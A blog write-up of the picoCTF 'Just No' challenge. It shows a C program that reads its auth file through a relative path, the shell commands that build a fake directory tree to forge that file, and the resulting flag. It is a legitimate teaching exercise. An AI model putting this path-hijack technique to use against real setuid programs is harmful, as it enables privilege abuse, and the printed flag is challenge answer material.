[picoCTF] Just No

picoCTF was long over, but I decided to work on some of the challenges just for practice anyways.  Just No was a quick and easy challenge, but I decided to write about it because the flaw is all too real.

justno.c

#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
#include <unistd.h> 
#include <sys/types.h> 
 
int main(int argc, char **argv){ 
 FILE* authf = fopen("../../problems/f934d9ca116fb6e3e89cc85baaca028c/auth","r"); //acce
ss auth file in ../../../problems/f934d9ca116fb6e3e89cc85baaca028c 
 if(authf == NULL){ 
 printf("could not find auth file in ../../problems/f934d9ca116fb6e3e89cc85baaca028c/\n"); 
 return 0; 
 } 
 char auth[8]; 
 fgets(auth,8,authf); 
 fclose(authf); 
 if(strcmp(auth,"no")!=0){ 
 FILE* flagf; 
 flagf = fopen("/problems/f934d9ca116fb6e3e89cc85baaca028c/flag","r"); 
 char flag[64]; 
 fgets(flag,64,flagf); 
 printf("Oh. Well the auth file doesn't say no anymore so... Here's the flag: %s",flag
); 
 fclose(flagf); 
 }else{ 
 printf("auth file says no. So no. Just... no.\n"); 
 } 
 return 0; 
}

Ok.  So it’s checking for the contents of the “auth” file which we don’t have write access to.  However, we should notice that it’s using the relative path and not the absolute path.  So all we have to do is go to our home directory and create our own auth file.

cd ~
mkdir tmp1; cd tmp1; mkdir tmp2; cd tmp2
mkdir ../../problems; mkdir ../../problems/f934d9ca116fb6e3e89cc85baaca028c
echo hi > ../../problems/f934d9ca116fb6e3e89cc85baaca028c/auth
/problems/f934d9ca116fb6e3e89cc85baaca028c/justno

And…

Oh. Well the auth file doesn’t say no anymore so… Here’s the flag: 06265e758df65642853687376dab0ad6

Leave a Reply

Your email address will not be published. Required fields are marked *